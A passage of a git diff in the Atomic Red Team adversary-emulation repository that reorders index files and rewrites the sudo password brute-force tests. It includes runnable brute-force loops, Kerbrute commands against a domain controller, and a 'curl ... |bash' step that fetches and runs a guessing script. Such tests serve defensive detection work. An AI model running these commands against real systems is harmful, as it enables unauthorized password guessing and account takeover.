Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.003/T1562.003.md"}]},{"techniqueID":"T1562.004","score":9,"enabled":true,"comment":"\n- Stop/Start UFW firewall\n- Stop/Start UFW firewall systemctl\n- Turn off UFW logging\n- Add and delete UFW firewall rules\n- Edit UFW firewall user.rules file\n- Edit UFW firewall ufw.conf file\n- Edit UFW firewall sysctl.conf file\n- Edit UFW firewall main configuration file\n- Tail the UFW firewall log file\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.004/T1562.004.md"}]},{"techniqueID":"T1562.006","score":2,"enabled":true,"comment":"\n- Auditing Configuration Changes on Linux Host\n- Logging Configuration Changes on Linux Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.006/T1562.006.md"}]},{"techniqueID":"T1562.008","score":3,"enabled":true,"comment":"\n- AWS - Disable CloudTrail Logging Through Event Selectors using Stratus\n- AWS - CloudTrail Logs Impairment Through S3 Lifecycle Rule using Stratus\n- AWS - Remove VPC Flow Logs using Stratus\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.008/T1562.008.md"}]},{"techniqueID":"T1564","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564/T1564.md"}]},{"techniqueID":"T1564.001","score":1,"enabled":true,"comment":"\n- Create a hidden file in a hidden directory\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1564.001/T1564.001.md"}]},{"techniqueID":"T1569","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569/T1569.md"}]},{"techniqueID":"T1569.002","score":1,"enabled":true,"comment":"\n- psexec.py (Impacket)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1569.002/T1569.002.md"}]},{"techniqueID":"T1571","score":1,"enabled":true,"comment":"\n- Testing usage of uncommonly used port\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1571/T1571.md"}]},{"techniqueID":"T1574","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574/T1574.md"}]},{"techniqueID":"T1574.006","score":2,"enabled":true,"comment":"\n- Shared Library Injection via /etc/ld.so.preload\n- Shared Library Injection via LD_PRELOAD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1574.006/T1574.006.md"}]},{"techniqueID":"T1580","score":1,"enabled":true,"comment":"\n- AWS - EC2 Enumeration from Cloud Instance\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1580/T1580.md"}]},{"techniqueID":"T1614","score":4,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614/T1614.md"}]},{"techniqueID":"T1614.001","score":4,"enabled":true,"comment":"\n- Discover System Language with locale\n- Discover System Language with localectl\n- Discover System Language by locale file\n- Discover System Language by Environment Variable Query\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1614.001/T1614.001.md"}]}]} \ No newline at end of file diff --git a/atomics/Indexes/Indexes-CSV/index.csv b/atomics/Indexes/Indexes-CSV/index.csv index ddf56fc26f..7aa87d2ff4 100644 --- a/atomics/Indexes/Indexes-CSV/index.csv +++ b/atomics/Indexes/Indexes-CSV/index.csv @@ -1030,9 +1030,9 @@ credential-access,T1056.001,Input Capture: Keylogging,7,MacOS Swift Keylogger,ae credential-access,T1110.001,Brute Force: Password Guessing,1,Brute Force Credentials of single Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt credential-access,T1110.001,Brute Force: Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell credential-access,T1110.001,Brute Force: Password Guessing,3,Brute Force Credentials of single Azure AD user,5a51ef57-299e-4d62-8e11-2d440df55e69,powershell -credential-access,T1110.001,Brute Force: Password Guessing,4,SUDO brute force Debian,464b63e8-bf1f-422e-9e2c-2aa5080b6f9a,sh -credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO brute force Redhat,b72958a7-53e3-4809-9ee1-58f6ecd99ade,sh -credential-access,T1110.001,Brute Force: Password Guessing,6,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell +credential-access,T1110.001,Brute Force: Password Guessing,4,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell +credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO Brute Force - Debian,ba1bf0b6-f32b-4db0-b7cc-d78cacc76700,bash +credential-access,T1110.001,Brute Force: Password Guessing,6,SUDO Brute Force - Redhat,4097bc00-5eeb-4d56-aaf9-287d60351d95,bash credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell diff --git a/atomics/Indexes/Indexes-CSV/linux-index.csv b/atomics/Indexes/Indexes-CSV/linux-index.csv index 1e26228b6d..fc0749bf79 100644 --- a/atomics/Indexes/Indexes-CSV/linux-index.csv +++ b/atomics/Indexes/Indexes-CSV/linux-index.csv @@ -173,8 +173,8 @@ credential-access,T1056.001,Input Capture: Keylogging,3,Logging bash history to credential-access,T1056.001,Input Capture: Keylogging,4,Bash session based keylogger,7f85a946-a0ea-48aa-b6ac-8ff539278258,sh credential-access,T1056.001,Input Capture: Keylogging,5,SSHD PAM keylogger,81d7d2ad-d644-4b6a-bea7-28ffe43becca,sh credential-access,T1056.001,Input Capture: Keylogging,6,Auditd keylogger,a668edb9-334e-48eb-8c2e-5413a40867af,sh -credential-access,T1110.001,Brute Force: Password Guessing,4,SUDO brute force Debian,464b63e8-bf1f-422e-9e2c-2aa5080b6f9a,sh -credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO brute force Redhat,b72958a7-53e3-4809-9ee1-58f6ecd99ade,sh +credential-access,T1110.001,Brute Force: Password Guessing,5,SUDO Brute Force - Debian,ba1bf0b6-f32b-4db0-b7cc-d78cacc76700,bash +credential-access,T1110.001,Brute Force: Password Guessing,6,SUDO Brute Force - Redhat,4097bc00-5eeb-4d56-aaf9-287d60351d95,bash credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,1,Dump individual process memory with sh (Local),7e91138a-8e74-456d-a007-973d67a0bb80,sh credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,2,Dump individual process memory with Python (Local),437b2003-a20d-4ed8-834c-4964f24eec63,sh credential-access,T1003.007,OS Credential Dumping: Proc Filesystem,3,Capture Passwords with MimiPenguin,a27418de-bdce-4ebd-b655-38f04842bf0c,bash diff --git a/atomics/Indexes/Indexes-CSV/windows-index.csv b/atomics/Indexes/Indexes-CSV/windows-index.csv index c548ca6a5e..6c945cd458 100644 --- a/atomics/Indexes/Indexes-CSV/windows-index.csv +++ b/atomics/Indexes/Indexes-CSV/windows-index.csv @@ -719,7 +719,7 @@ lateral-movement,T1021.001,Remote Services: Remote Desktop Protocol,3,Changing R credential-access,T1056.001,Input Capture: Keylogging,1,Input Capture,d9b633ca-8efb-45e6-b838-70f595c6ae26,powershell credential-access,T1110.001,Brute Force: Password Guessing,1,Brute Force Credentials of single Active Directory domain users via SMB,09480053-2f98-4854-be6e-71ae5f672224,command_prompt credential-access,T1110.001,Brute Force: Password Guessing,2,Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos),c2969434-672b-4ec8-8df0-bbb91f40e250,powershell -credential-access,T1110.001,Brute Force: Password Guessing,6,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell +credential-access,T1110.001,Brute Force: Password Guessing,4,Password Brute User using Kerbrute Tool,59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4,powershell credential-access,T1003,OS Credential Dumping,1,Gsecdump,96345bfc-8ae7-4b6a-80b7-223200f24ef9,command_prompt credential-access,T1003,OS Credential Dumping,2,Credential Dumping with NPPSpy,9e2173c0-ba26-4cdf-b0ed-8c54b27e3ad6,powershell credential-access,T1003,OS Credential Dumping,3,Dump svchost.exe to gather RDP credentials,d400090a-d8ca-4be0-982e-c70598a23de9,powershell diff --git a/atomics/Indexes/Indexes-Markdown/index.md b/atomics/Indexes/Indexes-Markdown/index.md index 459ac7ee4e..6440b735ed 100644 --- a/atomics/Indexes/Indexes-Markdown/index.md +++ b/atomics/Indexes/Indexes-Markdown/index.md @@ -1676,9 +1676,9 @@ - Atomic Test #1: Brute Force Credentials of single Active Directory domain users via SMB [windows] - Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows] - Atomic Test #3: Brute Force Credentials of single Azure AD user [azure-ad] - - Atomic Test #4: SUDO brute force Debian [linux] - - Atomic Test #5: SUDO brute force Redhat [linux] - - Atomic Test #6: Password Brute User using Kerbrute Tool [windows] + - Atomic Test #4: Password Brute User using Kerbrute Tool [windows] + - Atomic Test #5: SUDO Brute Force - Debian [linux] + - Atomic Test #6: SUDO Brute Force - Redhat [linux] - [T1003 OS Credential Dumping](../../T1003/T1003.md) - Atomic Test #1: Gsecdump [windows] - Atomic Test #2: Credential Dumping with NPPSpy [windows] diff --git a/atomics/Indexes/Indexes-Markdown/linux-index.md b/atomics/Indexes/Indexes-Markdown/linux-index.md index 7c49a07087..37b84a443e 100644 --- a/atomics/Indexes/Indexes-Markdown/linux-index.md +++ b/atomics/Indexes/Indexes-Markdown/linux-index.md @@ -392,8 +392,8 @@ - Atomic Test #5: SSHD PAM keylogger [linux] - Atomic Test #6: Auditd keylogger [linux] - [T1110.001 Brute Force: Password Guessing](../../T1110.001/T1110.001.md) - - Atomic Test #4: SUDO brute force Debian [linux] - - Atomic Test #5: SUDO brute force Redhat [linux] + - Atomic Test #5: SUDO Brute Force - Debian [linux] + - Atomic Test #6: SUDO Brute Force - Redhat [linux] - T1003 OS Credential Dumping [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1539 Steal Web Session Cookie [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) - T1555.002 Securityd Memory [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing) diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 064625ccae..7150df8ef8 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md @@ -1195,7 +1195,7 @@ - [T1110.001 Brute Force: Password Guessing](../../T1110.001/T1110.001.md) - Atomic Test #1: Brute Force Credentials of single Active Directory domain users via SMB [windows] - Atomic Test #2: Brute Force Credentials of single Active Directory domain user via LDAP against domain controller (NTLM or Kerberos) [windows] - - Atomic Test #6: Password Brute User using Kerbrute Tool [windows] + - Atomic Test #4: Password Brute User using Kerbrute Tool [windows] - [T1003 OS Credential Dumping](../../T1003/T1003.md) - Atomic Test #1: Gsecdump [windows] - Atomic Test #2: Credential Dumping with NPPSpy [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 09a45a5c28..cbe0998c51 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -74960,81 +74960,6 @@ credential-access: } } Write-Host "End of bruteforce" - - name: SUDO brute force Debian - auto_generated_guid: 464b63e8-bf1f-422e-9e2c-2aa5080b6f9a - description: | - Attempts to sudo with current user using passwords from a list. Will run sudo 3 times, each with 3 different password attempts. - PreRequisites : debian,ubuntu,kali and pam_tally NOT configured. - If the password list contains the user password in last 9 entries, a sudo will be attempted and will succeed if user is in /etc/sudoers. - The /var/log/auth.log will show evidence of "3 incorrect password attempts" or "user NOT in sudoers" - supported_platforms: - - linux - dependency_executor_name: sh - dependencies: - - description: 'Check if running on a Debian based machine. - - ' - prereq_command: | - if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi - if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi - cp PathToAtomicsFolder/T1110.001/src/passwords.txt /tmp/workingfile - cp PathToAtomicsFolder/T1110.001/src/asker.sh /tmp/asker && chmod 755 /tmp/asker - if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi - get_prereq_command: 'apt-get update && apt-get install -y sudo - - ' - executor: - elevation_required: false - command: | - for i in 1 2 3 ; do SUDO_ASKPASS=/tmp/asker sudo -k -A whoami && wc -l /tmp/workingfile; done - echo done - cleanup_command: 'rm -f /tmp/asker /tmp/workingfile - - ' - name: sh - - name: SUDO brute force Redhat - auto_generated_guid: b72958a7-53e3-4809-9ee1-58f6ecd99ade - description: "Brute force the password of a local user account which is a member - of the sudo'ers group on a Redhat based Linux distribution. \n" - supported_platforms: - - linux - dependency_executor_name: sh - dependencies: - - description: 'Check if running on a Redhat based machine. - - ' - prereq_command: | - if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "Redhat"; else echo "NOT Redhat"; exit 1; fi - if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi - if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi - if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi - get_prereq_command: 'yum -y update && yum install -y openssl sudo - - ' - executor: - elevation_required: true - command: | - useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password) target - su target - - PASSWORDS=(one two three password five); \ - touch /tmp/file; \ - for P in ${PASSWORDS[@]}; do \ - date +"%b %d %T"; \ - sudo -k && echo "$P" |sudo -S whoami &>/tmp/file; \ - echo "exit: $?"; \ - if grep -q "root" /tmp/file; then \ - echo "FOUND: sudo => $P"; break; \ - else \ - echo "TRIED: $P"; \ - fi; \ - sleep 2; \ - done; \ - rm /tmp/file - cleanup_command: 'userdel target - - ' - name: sh - name: Password Brute User using Kerbrute Tool auto_generated_guid: 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4 description: 'Bruteforce a single user''s password from a wordlist @@ -75080,6 +75005,92 @@ credential-access: elevation_required: false command: "cd $env:temp\n.\\kerbrute.exe bruteuser --dc #{domaincontroller} -d #{domain} $env:temp\\bruteuser.txt TestUser1 \n" + - name: SUDO Brute Force - Debian + auto_generated_guid: ba1bf0b6-f32b-4db0-b7cc-d78cacc76700 + description: "An adversary may find themselves on a box (e.g. via ssh key auth, + with no password) with a user that has sudo'ers privileges, but they do not + know the users password. Normally, failed attempts to access root will not + cause the root account to become locked, to prevent denial-of-service. This + functionality enables an attacker to undertake a local brute force password + guessing attack without locking out the root user. \n\nThis test creates the + \"art\" user with a password of \"password123\", logs in, downloads and executes + the sudo_bruteforce.sh which brute force guesses the password, then deletes + the user\n" + supported_platforms: + - linux + input_arguments: + remote_url: + description: url of remote payload + type: Url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh + dependency_executor_name: bash + dependencies: + - description: 'Check if running on a Debian based machine. + + ' + prereq_command: | + if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi + if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi + if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi + if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi + if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi + get_prereq_command: 'apt update && apt install -y openssl sudo curl + + ' + executor: + name: bash + elevation_required: true + command: | + useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password123) art + su art + cd /tmp + curl -s #{remote_url} |bash + cleanup_command: 'userdel -fr art + + ' + - name: SUDO Brute Force - Redhat + auto_generated_guid: 4097bc00-5eeb-4d56-aaf9-287d60351d95 + description: "An adversary may find themselves on a box (e.g. via ssh key auth, + with no password) with a user that has sudo'ers privileges, but they do not + know the users password. Normally, failed attempts to access root will not + cause the root account to become locked, to prevent denial-of-service. This + functionality enables an attacker to undertake a local brute force password + guessing attack without locking out the root user. \n\nThis test creates the + \"art\" user with a password of \"password123\", logs in, downloads and executes + the sudo_bruteforce.sh which brute force guesses the password, then deletes + the user\n" + supported_platforms: + - linux + input_arguments: + remote_url: + description: url of remote payload + type: Url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh + dependency_executor_name: bash + dependencies: + - description: 'Check if running on a Redhat based machine. + + ' + prereq_command: | + if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "RedHat"; else echo "NOT RedHat"; exit 1; fi + if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi + if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi + if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi + if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi + get_prereq_command: 'yum update && yum install -y openssl sudo curl + + ' + executor: + name: bash + elevation_required: true + command: | + useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password123) art + su art + cd /tmp + curl -s #{remote_url} |bash + cleanup_command: 'userdel -fr art + + ' T1003: technique: x_mitre_platforms: diff --git a/atomics/Indexes/linux-index.yaml b/atomics/Indexes/linux-index.yaml index 3d22c2aec2..2ab88d2cce 100644 --- a/atomics/Indexes/linux-index.yaml +++ b/atomics/Indexes/linux-index.yaml @@ -50793,81 +50793,92 @@ credential-access: x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5 identifier: T1110.001 atomic_tests: - - name: SUDO brute force Debian - auto_generated_guid: 464b63e8-bf1f-422e-9e2c-2aa5080b6f9a - description: | - Attempts to sudo with current user using passwords from a list. Will run sudo 3 times, each with 3 different password attempts. - PreRequisites : debian,ubuntu,kali and pam_tally NOT configured. - If the password list contains the user password in last 9 entries, a sudo will be attempted and will succeed if user is in /etc/sudoers. - The /var/log/auth.log will show evidence of "3 incorrect password attempts" or "user NOT in sudoers" + - name: SUDO Brute Force - Debian + auto_generated_guid: ba1bf0b6-f32b-4db0-b7cc-d78cacc76700 + description: "An adversary may find themselves on a box (e.g. via ssh key auth, + with no password) with a user that has sudo'ers privileges, but they do not + know the users password. Normally, failed attempts to access root will not + cause the root account to become locked, to prevent denial-of-service. This + functionality enables an attacker to undertake a local brute force password + guessing attack without locking out the root user. \n\nThis test creates the + \"art\" user with a password of \"password123\", logs in, downloads and executes + the sudo_bruteforce.sh which brute force guesses the password, then deletes + the user\n" supported_platforms: - linux - dependency_executor_name: sh + input_arguments: + remote_url: + description: url of remote payload + type: Url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh + dependency_executor_name: bash dependencies: - description: 'Check if running on a Debian based machine. ' prereq_command: | - if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi + if grep -iq "debian\|ubuntu\|kali\|mint" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi - cp PathToAtomicsFolder/T1110.001/src/passwords.txt /tmp/workingfile - cp PathToAtomicsFolder/T1110.001/src/asker.sh /tmp/asker && chmod 755 /tmp/asker - if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi - get_prereq_command: 'apt-get update && apt-get install -y sudo + if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi + if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi + if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi + get_prereq_command: 'apt update && apt install -y openssl sudo curl ' executor: - elevation_required: false + name: bash + elevation_required: true command: | - for i in 1 2 3 ; do SUDO_ASKPASS=/tmp/asker sudo -k -A whoami && wc -l /tmp/workingfile; done - echo done - cleanup_command: 'rm -f /tmp/asker /tmp/workingfile - - ' - name: sh - - name: SUDO brute force Redhat - auto_generated_guid: b72958a7-53e3-4809-9ee1-58f6ecd99ade - description: "Brute force the password of a local user account which is a member - of the sudo'ers group on a Redhat based Linux distribution. \n" + useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password123) art + su art + cd /tmp + curl -s #{remote_url} |bash + cleanup_command: 'userdel -fr art + + ' + - name: SUDO Brute Force - Redhat + auto_generated_guid: 4097bc00-5eeb-4d56-aaf9-287d60351d95 + description: "An adversary may find themselves on a box (e.g. via ssh key auth, + with no password) with a user that has sudo'ers privileges, but they do not + know the users password. Normally, failed attempts to access root will not + cause the root account to become locked, to prevent denial-of-service. This + functionality enables an attacker to undertake a local brute force password + guessing attack without locking out the root user. \n\nThis test creates the + \"art\" user with a password of \"password123\", logs in, downloads and executes + the sudo_bruteforce.sh which brute force guesses the password, then deletes + the user\n" supported_platforms: - linux - dependency_executor_name: sh + input_arguments: + remote_url: + description: url of remote payload + type: Url + default: https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh + dependency_executor_name: bash dependencies: - description: 'Check if running on a Redhat based machine. ' prereq_command: | - if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "Redhat"; else echo "NOT Redhat"; exit 1; fi + if grep -iq "rhel\|fedora\|centos" /usr/lib/os-release; then echo "RedHat"; else echo "NOT RedHat"; exit 1; fi if grep -Rq "pam_faillock" /etc/pam.d/*; then echo "pam_faillock configured"; exit 1; fi - if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi - if [ -x "$(command -v openssl)" ]; then echo "openssl installed"; else echo "install openssl"; fi - get_prereq_command: 'yum -y update && yum install -y openssl sudo + if [ -x "$(command -v openssl)" ]; then echo "openssl is installed"; else echo "openssl is NOT installed"; exit 1; fi + if [ -x "$(command -v sudo)" ]; then echo "sudo is installed"; else echo "sudo is NOT installed"; exit 1; fi + if [ -x "$(command -v curl)" ]; then echo "curl is installed"; else echo "curl is NOT installed"; exit 1; fi + get_prereq_command: 'yum update && yum install -y openssl sudo curl ' executor: + name: bash elevation_required: true command: | - useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password) target - su target - - PASSWORDS=(one two three password five); \ - touch /tmp/file; \ - for P in ${PASSWORDS[@]}; do \ - date +"%b %d %T"; \ - sudo -k && echo "$P" |sudo -S whoami &>/tmp/file; \ - echo "exit: $?"; \ - if grep -q "root" /tmp/file; then \ - echo "FOUND: sudo => $P"; break; \ - else \ - echo "TRIED: $P"; \ - fi; \ - sleep 2; \ - done; \ - rm /tmp/file - cleanup_command: 'userdel target + useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password123) art + su art + cd /tmp + curl -s #{remote_url} |bash + cleanup_command: 'userdel -fr art ' - name: sh T1003: technique: x_mitre_platforms: diff --git a/atomics/T1110.001/T1110.001.md b/atomics/T1110.001/T1110.001.md index db7b54ba9c..be9c49b578 100644 --- a/atomics/T1110.001/T1110.001.md +++ b/atomics/T1110.001/T1110.001.md @@ -32,11 +32,11 @@ In default environments, LDAP and Kerberos connection attempts are less likely t - [Atomic Test #3 - Brute Force Credentials of single Azure AD user](#atomic-test-3---brute-force-credentials-of-single-azure-ad-user) -- [Atomic Test #4 - SUDO brute force Debian](#atomic-test-4---sudo-brute-force-debian) +- [Atomic Test #4 - Password Brute User using Kerbrute Tool](#atomic-test-4---password-brute-user-using-kerbrute-tool) -- [Atomic Test #5 - SUDO brute force Redhat](#atomic-test-5---sudo-brute-force-redhat) +- [Atomic Test #5 - SUDO Brute Force - Debian](#atomic-test-5---sudo-brute-force---debian) -- [Atomic Test #6 - Password Brute User using Kerbrute Tool](#atomic-test-6---password-brute-user-using-kerbrute-tool) +- [Atomic Test #6 - SUDO Brute Force - Redhat](#atomic-test-6---sudo-brute-force---redhat)
@@ -198,50 +198,54 @@ Install-Module -Name AzureAD -Force

-## Atomic Test #4 - SUDO brute force Debian -Attempts to sudo with current user using passwords from a list. Will run sudo 3 times, each with 3 different password attempts. -PreRequisites : debian,ubuntu,kali and pam_tally NOT configured. -If the password list contains the user password in last 9 entries, a sudo will be attempted and will succeed if user is in /etc/sudoers. -The /var/log/auth.log will show evidence of "3 incorrect password attempts" or "user NOT in sudoers" +## Atomic Test #4 - Password Brute User using Kerbrute Tool +Bruteforce a single user's password from a wordlist -**Supported Platforms:** Linux +**Supported Platforms:** Windows -**auto_generated_guid:** 464b63e8-bf1f-422e-9e2c-2aa5080b6f9a +**auto_generated_guid:** 59dbeb1a-79a7-4c2a-baf4-46d0f4c761c4 + +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| domaincontroller | Domain controller where test will be run | string | $ENV:userdnsdomain| +| domain | Domain where you will be testing | string | $ENV:userdomain| -#### Attack Commands: Run with `sh`! +#### Attack Commands: Run with `powershell`! -```sh -for i in 1 2 3 ; do SUDO_ASKPASS=/tmp/asker sudo -k -A whoami && wc -l /tmp/workingfile; done -echo done +```powershell +cd $env:temp +.\kerbrute.exe bruteuser --dc #{domaincontroller} -d #{domain} $env:temp\bruteuser.txt TestUser1 ``` -#### Cleanup Commands: -```sh -rm -f /tmp/asker /tmp/workingfile -``` -#### Dependencies: Run with `sh`! -##### Description: Check if running on a Debian based machine. +#### Dependencies: Run with `powershell`! +##### Description: kerbrute.exe must exist in $env:temp ##### Check Prereq Commands: -```sh -if grep -iq "debian\|ubuntu\|kali" /usr/lib/os-release; then echo "Debian"; else echo "NOT Debian"; exit 1; fi -if grep -Rq "pam_tally" /etc/pam.d/*; then echo "pam_tally configured"; exit 1; fi -cp PathToAtomicsFolder/T1110.001/src/passwords.txt /tmp/workingfile -cp PathToAtomicsFolder/T1110.001/src/asker.sh /tmp/asker && chmod 755 /tmp/asker -if [ -x "$(command -v sudo)" ]; then echo "sudo installed"; else echo "install sudo"; fi +```powershell +if (test-path $env:temp\kerbrute.exe){exit 0} else {exit 1} +``` +##### Get Prereq Commands: +```powershell +invoke-webrequest "https://github.com/ropnop/kerbrute/releases/download/v1.0.3/kerbrute_windows_386.exe" -outfile "$env:temp\kerbrute.exe" +``` +##### Description: bruteuser.txt must exist in $env:temp +##### Check Prereq Commands: +```powershell +if (test-path $env:temp\bruteuser.txt){exit 0} else {exit 1} ``` ##### Get Prereq Commands: -```sh -apt-get update && apt-get install -y sudo +```powershell +invoke-webrequest "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/src/bruteuser.txt?raw=true" -outfile "$env:temp\bruteuser.txt" ``` @@ -250,61 +254,56 @@ apt-get update && apt-get install -y sudo

-## Atomic Test #5 - SUDO brute force Redhat -Brute force the password of a local user account which is a member of the sudo'ers group on a Redhat based Linux distribution. +## Atomic Test #5 - SUDO Brute Force - Debian +An adversary may find themselves on a box (e.g. via ssh key auth, with no password) with a user that has sudo'ers privileges, but they do not know the users password. Normally, failed attempts to access root will not cause the root account to become locked, to prevent denial-of-service. This functionality enables an attacker to undertake a local brute force password guessing attack without locking out the root user. + +This test creates the "art" user with a password of "password123", logs in, downloads and executes the sudo_bruteforce.sh which brute force guesses the password, then deletes the user **Supported Platforms:** Linux -**auto_generated_guid:** b72958a7-53e3-4809-9ee1-58f6ecd99ade +**auto_generated_guid:** ba1bf0b6-f32b-4db0-b7cc-d78cacc76700 +#### Inputs: +| Name | Description | Type | Default Value | +|------|-------------|------|---------------| +| remote_url | url of remote payload | Url | https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1110.001/src/sudo_bruteforce.sh| -#### Attack Commands: Run with `sh`! Elevation Required (e.g. root or admin) +#### Attack Commands: Run with `bash`! Elevation Required (e.g. root or admin) -```sh -useradd -G wheel -s /bin/bash -p $(openssl passwd -1 password) target -su target -PASSWORDS=(one two three password five); \ - touch /tmp/file; \ - for P in ${PASSWORDS[@]}; do \ - date +"%b %d %T"; \ - sudo -k && echo "$P" |sudo -S whoami &>/tmp/file; \ - echo "exit: $?"; \ - if grep -q "root" /tmp/file; then \ - echo "FOUND: sudo => $P"; break; \ - else \ - echo "TRIED: $P"; \ - fi; \ - sleep 2; \ - done; \ - rm /tmp/file +```bash +useradd -G sudo -s /bin/bash -p $(openssl passwd -1 password123) art +su art +cd /tmp +curl -s #{remote_url} |bash ``` #### Cleanup Commands: -```sh -userdel target +```bash +userdel -fr art ``` -#### Dependencies: Run with `sh`! -##### Description: Check if running on a Redhat based machine. +#### Dependencies: Run with `bash`! +##### Description: Check if running on a Debian based machine. ##### Check Prereq Commands: -```sh -if grep -iq "rhel\|fedora\|centos" 